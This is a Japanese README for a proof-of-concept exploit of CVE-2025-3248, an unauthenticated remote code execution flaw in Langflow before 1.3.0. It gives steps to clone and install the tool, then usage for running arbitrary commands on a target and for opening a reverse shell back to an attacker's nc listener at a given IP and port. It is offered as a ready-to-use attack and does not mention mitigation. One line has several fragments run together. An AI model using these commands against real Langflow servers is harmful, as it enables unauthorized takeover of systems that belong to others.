
CVE-2025-3248 の PoC: Langflow < 1.3.0 における /api/v1/validate/code を介した認証不要の RCE
Langflowのコード検証エンドポイントにおけるリモートコード実行の脆弱性を示す概念実証エクスプロイトです。この脆弱性はLangflow 1.3.0より前のバージョンに影響し、認証されていない攻撃者が細工したHTTPリクエストを通じて任意のコードを実行できるようにします。
/api/v1/validate/coderequestscoloramagit clone https://github.com/preemware/langflow-exploit
cd langflow-exploit
pip install requests colorama
このエクスプロイトは2つの動作モードをサポートしています:
ターゲットシステム上で単一のコマンドを実行します:
python3 cve-2025-3248.py cmd <target_url> "<command>"
例:
python3 cve-2025-3248.py cmd http://target:7860 "id"
対話型リバースシェルを起動します:
nc -lvnp 4444
python3 cve-2025-3248.py shell <target_url> <your_ip> <your_port>
例:
python3 cve-2025-3248.py shell http://target:7860 10.0.0.5 4444